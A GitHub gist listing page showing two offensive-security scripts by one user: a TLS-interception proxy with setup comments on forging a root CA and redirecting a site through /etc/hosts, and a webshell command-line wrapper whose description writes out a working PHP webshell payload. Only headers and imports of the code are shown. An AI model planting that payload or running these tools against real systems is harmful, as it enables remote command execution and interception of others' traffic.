Hexabeast hexabeast
hexabeast
/ portfwd_SSL_all.py
Last active
May 23, 2020 01:06
TLS socket interception, compatible with HTTP2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #pip3 install certauth | |
| #certauth myrootca.pem --certname "My Test CA" | |
| #For http2 : mkdir streams | |
| #Get website real IP then put website.com as localhost in /etc/hosts | |
| #python3 portfwd_SSL_all.py 443 website.com 443 WEBSITE_REAL_IP | |
| import socket | |
| import ssl | |
| import sys | |
| import threading |
hexabeast
/ webwrap.py
Last active
August 15, 2020 00:20
Basic webshell commandline wrapper, gives a nice-looking shell (without revshell/bind shell) using any page containing this kind of payload somewhere in it : <?php echo shell_exec($_GET[e]); ?>
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| #USAGE : webwrap 'http://somewebsite.com/shell.php?cmd=' | |
| import readline | |
| from termcolor import colored | |
| import urllib.parse | |
| import sys | |
| import requests |